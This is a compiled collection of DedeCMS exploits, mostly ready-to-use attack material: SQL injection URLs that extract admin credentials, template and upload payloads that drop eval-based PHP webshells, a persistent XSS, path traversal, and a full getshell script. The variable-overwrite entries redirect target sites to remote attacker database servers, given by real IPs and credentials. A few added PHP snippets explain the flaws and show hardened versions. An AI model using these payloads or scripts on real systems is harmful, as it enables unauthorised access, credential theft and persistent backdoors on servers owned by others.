Dedecms 5.6 rss.php SQL injection

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

Error-based injection through the _Cs[] array parameter: updatexml() raises an XPath error whose message carries the admin user name and 16 characters of the stored password hash, wrapped in [ and ] (0x5b, 0x3a and 0x5d are "[", ":" and "]").

DedeCms v5.6 embedded malicious code execution

Register a member account and upload a "software" item; in the local address field enter:

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}

Once published, viewing or editing the item executes the code. The variant below writes a one-line webshell instead of calling phpinfo():

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

This creates x.php holding a one-line shell; the password is xiao. The two base64 strings decode to x.php and <?php eval($_POST[xiao])?>baidu.

Dede 5.6 GBK SQL injection (member/index.php)

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

Injection through the uid parameter on GBK builds; the three probe URLs are given as posted.

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL execution

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

The sql parameter is executed as given. #@__ (URL-encoded as %23@__) is DedeCMS's table-prefix placeholder, so `#@__admin` resolves to the admin table whatever prefix the site uses.

DEDECMS (all versions) gotopage XSS

1. Open the URL below to trigger the XSS and install the "XSS rootkit". IE8/9 block URL-borne XSS of this kind, so their XSS filter has to be switched off first.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

Decoded, the String.fromCharCode() payload is a short script that stores the string "><script>alert(/xss rootkit!/)</script><x=" in a cookie named gotopage with a 365-day expiry and then alerts "Xss Rootkit Install Successful". Because the login page takes gotopage from the cookie as readily as from the query string, the stored value is reflected on every later visit.

2. Close the browser. From then on any of the URLs below triggers the XSS, with or without a gotopage parameter:

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS variable overwrite getshell

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
// url and aid are required; path is the optional sub-directory DedeCMS is
// installed in. aid selects which row of the attacker-side dede_mytag table
// mytag_js.php fetches, and therefore where that row's {dede:php} body
// writes the shell.
if (!isset($argv[2])) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shell path /data/cache   aid=2 shell path /   aid=3 shell path /plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = isset($argv[3]) ? trim($argv[3], '/') : '';
$base = ($path === '') ? '' : '/'.$path;
$exp  = Getshell($url, $aid, $base);
// The {dede:php} body stored in the attacker's dede_mytag row echoes "OK"
// after writing the shell (see the tag remote file write entry below), so
// "OK" in the response body means the write happened. The original read only
// the status line and tested the position of "OK" in "HTTP/1.1 200 OK".
if ($exp !== false && strpos($exp, "OK") !== false) {
    echo "Exploit Success \n";
    if ($aid == 1) echo "Shell:".$url.$base."/data/cache/fuck.php\n";
    if ($aid == 2) echo "Shell:".$url.$base."/fuck.php\n";
    if ($aid == 3) echo "Shell:".$url.$base."/plus/fuck.php\n";
} else {
    echo "Exploit Failed \n";
}

function Getshell($url, $aid, $base)
{
    $id   = $aid;
    $host = $url;   // bare host name, e.g. www.site.com (no scheme)
    $port = 80;
    // The _COOKIE[GLOBALS][cfg_*] fields repoint the target's database
    // connection at the attacker's MySQL server. The host, user, password and
    // database name below are the original author's; replace them with your
    // own server holding the dede_mytag rows.
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST ".$base."/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    // "close" rather than "keep-alive", otherwise the read loop below never
    // reaches EOF.
    $data .= "Connection: close\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content;
    $ock = fsockopen($host, $port, $errno, $errstr, 10);
    if (!$ock) {
        echo "No response from ".$host.": ".$errstr."\n";
        return false;
    }
    fwrite($ock, $data);
    // Read the whole response; the original returned after the first line.
    $exp = '';
    while (!feof($ock)) {
        $exp .= fgets($ock, 1024);
    }
    fclose($ock);
    // Return the body only, so the "OK" of the status line does not count.
    $parts = explode("\r\n\r\n", $exp, 2);
    return isset($parts[1]) ? $parts[1] : '';
}
?>

DedeCms v5.6-5.7 unauthorized access (straight into the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Replace validate=dcug with the captcha currently shown and the request logs you straight into the backend. The _POST[GLOBALS][cfg_db*] parameters are the same variable overwrite as the mytag_js.php entries: they repoint the database connection at the host named in the URL (here the original author's server, with root/r0t0), so the admin/inimda login is checked against that database's admin table rather than the target's own. (织梦网站后台 in the URL stands for the site's admin directory.)

Precondition: the backend directory path must be known.

Dedecms tag remote file write

Precondition: you need your own DedeCMS database (a MySQL server you control that the target can reach), and insert a row into it:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

(The string passed to @fwrite is empty as given on the page; put the shell source you want written there.) Then submit the form below; the shell appears as 1.php in the same directory. The original leaves the principle as an exercise; in short, the form posts the attacker's database settings under _COOKIE[GLOBALS][cfg_*] names, the target registers them over its own configuration, connects to that database, fetches the normbody above and executes its {dede:php} block. Fill in the host, user, password, database name and table prefix of your own database in place of the dbhost/dbuser/dbpwd/dbname placeholders.

<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the URL typed into the first field before it is posted
// (the original never called this function, so the form posted to itself).
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

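The request-variable registration pattern that the QuickSearch form above, the variable-overwrite script and the login.php entry all rely on, as an added example in PHP. This is not DedeCMS's own code: the loop shape, the blacklist regex and the demo request are reconstructions and assumptions, and a plain array stands in for PHP's global symbol table so the overwrite can be observed and asserted. A hardened registration is shown beside it.

```php
<?php
// Added example, not DedeCMS code: reconstruction of the request-variable
// registration pattern abused by the mytag_js.php / login.php entries above.
// Loop shape, regex and demo request are assumptions; $vars stands in for the
// global symbol table.

function fresh_symbol_table(array $get, array $post, array $cookie): array
{
    return [
        '_GET'    => $get,
        '_POST'   => $post,
        '_COOKIE' => $cookie,
        // Site configuration normally loaded from the config files.
        'GLOBALS' => ['cfg_dbhost' => 'localhost', 'cfg_dbuser' => 'dede', 'cfg_dbpwd' => 'secret'],
    ];
}

// Vulnerable pattern: a blacklist on request keys that start with cfg_ or
// GLOBALS, then ${$k} = $v for every key of _GET, _POST and _COOKIE in turn.
function register_request_vars_vulnerable(array $get, array $post, array $cookie): array
{
    $vars = fresh_symbol_table($get, $post, $cookie);
    foreach (array_merge($get, $post, $cookie) as $k => $v) {
        if (strlen((string)$k) > 0 && preg_match('/^(cfg_|GLOBALS)/i', (string)$k)) {
            throw new RuntimeException('Request var not allow!');
        }
    }
    foreach (['_GET', '_POST', '_COOKIE'] as $src) {
        // $vars[$src] is read afresh on each pass: a POST key named "_COOKIE"
        // replaces the cookie array before the cookie pass runs, and that pass
        // then registers the smuggled "GLOBALS" key, overwriting cfg_* values.
        foreach ($vars[$src] as $k => $v) {
            $vars[$k] = $v;
        }
    }
    return $vars;
}

// Hardened pattern: refuse keys that alias any request source or superglobal,
// and refuse nested arrays so a request cannot carry _COOKIE[GLOBALS][cfg_*]
// at all. Not auto-registering and reading $_GET/$_POST explicitly is the real
// fix; this is the minimum change to the pattern.
function register_request_vars_hardened(array $get, array $post, array $cookie): array
{
    $vars = fresh_symbol_table($get, $post, $cookie);
    $forbidden = '/^(cfg_|GLOBALS|_GET|_POST|_COOKIE|_REQUEST|_SESSION|_SERVER|_FILES|_ENV)/i';
    foreach (['_GET', '_POST', '_COOKIE'] as $src) {
        foreach ($vars[$src] as $k => $v) {
            if (preg_match($forbidden, (string)$k) || is_array($v)) {
                throw new RuntimeException('Request var not allow!');
            }
            $vars[$k] = $v;
        }
    }
    return $vars;
}

// Constructed POST body in the shape of the QuickSearch form above.
// 203.0.113.10 is a documentation address standing in for the attacker's DB.
function attacker_post(): array
{
    return [
        'doaction' => 'http://www.tmdsb.com/plus/mytag_js.php?aid=1',
        '_COOKIE'  => ['GLOBALS' => ['cfg_dbhost' => '203.0.113.10', 'cfg_dbuser' => 'exploit', 'cfg_dbpwd' => '90sec']],
        'nocache'  => 'true',
    ];
}

function vulnerable_dbhost(): string
{
    $vars = register_request_vars_vulnerable([], attacker_post(), []);
    return $vars['GLOBALS']['cfg_dbhost'];   // now the attacker's host
}

function hardened_rejects(): bool
{
    try {
        register_request_vars_hardened([], attacker_post(), []);
        return false;
    } catch (RuntimeException $e) {
        return true;
    }
}

echo "cfg_dbhost after vulnerable registration: " . vulnerable_dbhost() . "\n";
echo "hardened registration rejects the request: " . (hardened_rejects() ? 'yes' : 'no') . "\n";
```

Run it with php and the first line prints 203.0.113.10: the blacklist never sees a key starting with GLOBALS because the only top-level request key is _COOKIE, and the overwrite happens one pass later. The hardened version throws on the _COOKIE key before anything is registered.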
Dedecms <= V5.6 Final template execution

1. Register a user, go to the member area, publish an article and upload an image. Then, in attachment management, replace the image with a crafted template. For example the image is:

uploads/userup/2/12OMX04-15A.jpg

and the template content is (prefix it with GIF89a if the image format is checked):

{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article you just published, view the page source and build a form like the one below. The two fields that matter are templet (pointing at the uploaded "image") and dede_addonfields (which makes article_edit.php save templet as an extra field); everything else mirrors the normal edit form. aid, idhash and sortrank are the values of your own article.

<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>
<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/> (comma separated)
<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span> (coloured categories cannot be selected)
<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(short description of the content)
<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;"> (these two fields are the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">Content</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="&lt;div&gt;&lt;a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;&lt;?phpinfo()?&gt;1111111&lt;/p&gt;" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>
</div>
</form>

If the submission reports "modified successfully", the template path has been changed.

3. Open the modified article. Assuming its aid is 2:

http://127.0.0.1/dede/plus/view.php?aid=2

This writes the webshell 1.php into the plus directory.

DEDECMS Get Shell (5.3/5.6)

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}

Save this as 1.gif and build the upload form:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>

After uploading through this form the image is stored as /uploads/userup/3/1.gif. Publish an article, then build the edit form below (the same templet / dede_addonfields trick as the previous entry; aid, idhash and sortrank belong to your own article):

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>

Dedecms V5.6 remote file deletion

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

The oldface parameter is not confined to the member's own upload directory, so a ../ traversal deletes other files under the web root (here a template image).

Dedecms V5.6 plus/carbuyaction.php local file inclusion

http://www.test.com/plus/carbuya ... urn&code=../../

(URL truncated as given on the page; the code parameter takes a ../ traversal.)

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL execution (same entry as above, with a note on the password column)

plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

The pwd column is not a full 32-character MD5: it is the MD5 with the first 5 and the last 7 characters removed, leaving 20 characters. To get the standard 16-character MD5 from it, drop another 3 characters from the front and 1 from the end.

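The stored-hash layout described in the note above, together with the MID(pwd,4,16) slice that the rss.php payload at the top of the page extracts, as an added example in PHP (not DedeCMS code). It assumes the storage rule stated in the note, substr(md5($plain), 5, 20), and checks it against the well-known MD5 of "admin".

```php
<?php
// Added example, not DedeCMS code: relation between the 20-character pwd
// column, the full MD5 and the 16-character MD5. The storage rule below is
// the one stated in the note above, assumed here and verified on "admin".

// What the admin table holds: substr(md5(plain), 5, 20).
function dede_store_hash(string $plain): string
{
    return substr(md5($plain), 5, 20);
}

// Recover the 16-character MD5 from the stored value: drop 3 leading and
// 1 trailing character (the "3 from the front, 1 from the end" rule).
function dede_hash_to_md5_16(string $stored20): string
{
    if (strlen($stored20) !== 20) {
        throw new InvalidArgumentException('expected a 20-character DedeCMS hash');
    }
    return substr($stored20, 3, 16);
}

// What the rss.php updatexml() payload pulls out: MySQL MID(pwd,4,16) is
// 1-indexed, so it is exactly the same 16-character slice.
function mysql_mid_4_16(string $stored20): string
{
    return substr($stored20, 3, 16);
}

// Check a candidate plaintext against a stored hash via the 16-char form,
// which is the form found in common MD5 lookup tables.
function candidate_matches(string $candidate, string $stored20): bool
{
    return hash_equals(substr(md5($candidate), 8, 16), dede_hash_to_md5_16($stored20));
}

// Self-check on a known value: md5('admin') = 21232f297a57a5a743894a0e4a801fc3,
// so the stored form is f297a57a5a743894a0e4 and the 16-char MD5 is
// 7a57a5a743894a0e.
$stored = dede_store_hash('admin');
echo "stored pwd column : " . $stored . "\n";
echo "16-char MD5       : " . dede_hash_to_md5_16($stored) . "\n";
echo "MID(pwd,4,16)     : " . mysql_mid_4_16($stored) . "\n";
echo "'admin' matches   : " . (candidate_matches('admin', $stored) ? 'yes' : 'no') . "\n";
```

The three derived strings are identical, which is why the injection payload asks for MID(pwd,4,16) rather than the whole column: the result can be looked up directly as a 16-character MD5.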
Dedecms 5.1 feedback_js.php injection

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

The payload is two-stage: the outer union makes the first query return a string, and that string (the inner union) is used unescaped in a second query, which pulls userid and pwd from dede_admin into the feedback listing.

Dedecms select_soft_post.php uninitialised variable

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method="POST" enctype="multipart/form-data" name="myform">
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>

With register_globals on, the cfg_* values posted here initialise the upload-type whitelist and base directory that the script never sets itself, so a .php upload is accepted and written as /data/cache/fly.php.

Dedecms 5.3 - 5.5 plus/digg_frame.php injection

This combines a MySQL numeric overflow error with the way DEDECMS records database errors: the message is written into a PHP file (data/mysql_error_trace.php) whose header is never validated, so attacker-controlled text from the failing query ends up inside executable PHP.

1. Open:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

(URL truncated as given on the page.) An error message is displayed.

2. Open http://www.abc.com/data/mysql_error_trace.php. Seeing the following proves the injection worked:

int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

The leading int(3) is the output of the injected var_dump(3): the */ in the mid parameter closed the comment the error was logged in, eval($_POST[x]) and var_dump(3) ran, and the ?> turned the rest of the file into plain text.

3. Run test.html from dede.rar; the form's action must point at the trace file:

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the output from step 2 again means the shell is in place (the file now executes whatever is posted as x).

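The logging pattern behind the digg_frame.php entry, as an added example in PHP (not DedeCMS code). The page shows only the tail of the real trace file (*/ ?>), so the file layout here is an assumption consistent with that tail; the paths, the mid value and the SQL text are constructed for the demonstration. A hardened logger is shown beside the vulnerable one, and PHP's own tokenizer is used to check whether a written file contains live code.

```php
<?php
// Added example, not DedeCMS code: a database error containing attacker input
// is appended to a .php file inside a /* ... */ comment. Because the file is
// served by PHP, "*/" in the input closes the comment and the rest runs.
// File layout, paths and inputs below are assumptions/constructed.

function log_error_vulnerable(string $msg, string $sql, string $file): void
{
    // Assumed layout: error text wrapped in a PHP comment, no escaping.
    $entry = "<" . "?php\r\n/*\r\nError: {$msg}\r\nError sql: {$sql}\r\n*/\r\n?" . ">\r\n";
    file_put_contents($file, $entry, FILE_APPEND);
}

// Hardened: never write untrusted text into an executable file. Neutralise the
// comment terminator and PHP tags, and log as plain text with a non-executable
// extension (and, in a real deployment, outside the web root).
function log_error_hardened(string $msg, string $sql, string $file): void
{
    $clean = fn(string $s) => str_replace(['*/', '<?', '?>'], ['* /', '&lt;?', '?&gt;'], $s);
    $entry = date('c') . " Error: " . $clean($msg) . " | sql: " . $clean($sql) . "\n";
    file_put_contents($file, $entry, FILE_APPEND | LOCK_EX);
}

// Would PHP execute anything in this file? Tokenise it and look for any token
// other than open/close tags, comments, whitespace and inline HTML.
function contains_live_code(string $file): bool
{
    $skip = [T_OPEN_TAG, T_CLOSE_TAG, T_COMMENT, T_DOC_COMMENT, T_WHITESPACE, T_INLINE_HTML];
    foreach (token_get_all(file_get_contents($file)) as $tok) {
        if (is_string($tok)) {
            return true;                          // ';', '(' and similar
        }
        if (!in_array($tok[0], $skip, true)) {
            return true;                          // eval, function names, strings...
        }
    }
    return false;
}

function demo(): array
{
    $dir  = sys_get_temp_dir();
    $vuln = $dir . '/mysql_error_trace.php';
    $safe = $dir . '/mysql_error_trace.log';
    @unlink($vuln);
    @unlink($safe);
    // Constructed input in the shape of the page's mid= parameter, placed in
    // the failing query the way the vulnerable script would interpolate it.
    $mid = "*/eval(\$_POST['x']);var_dump(3);?>";
    $sql = "Select goodpost,badpost,scores From `dede_archives` where id=1024e1024 and mid={$mid} limit 0,1";
    $msg = "Illegal double '1024e1024' value found during parsing";
    log_error_vulnerable($msg, $sql, $vuln);
    log_error_hardened($msg, $sql, $safe);
    return [
        'vulnerable_file_has_live_code' => contains_live_code($vuln),   // true
        'hardened_file_has_live_code'   => contains_live_code($safe),   // false
    ];
}

var_dump(demo());
```

In the vulnerable file the tokenizer stops seeing a comment at the first */ and the next token is eval, which is what the browser request in step 2 executes; the hardened file is a single inline-HTML token with no PHP tag and a neutralised terminator, so nothing in it can run even if it were served as PHP.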
DedeCms plus/infosearch.php injection

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

The leading %cf byte is a wide-byte (GBK) prefix: it swallows the backslash that escaping adds in front of the quote, so the quote closes the string and the union runs.